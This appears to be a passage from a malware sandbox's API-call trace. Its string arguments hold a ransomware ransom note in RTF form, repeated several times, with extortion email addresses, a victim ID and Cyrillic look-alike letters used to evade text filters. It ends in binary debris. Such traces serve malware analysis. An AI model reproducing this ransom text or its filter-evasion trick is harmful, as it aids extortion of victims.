fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2662a08, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\nlM´¿\n~\x7f\x96x2Øéì÷ÊHÂ4\x17\x9b\x1a 4à\x0c´«½)+d\x9exT¨ 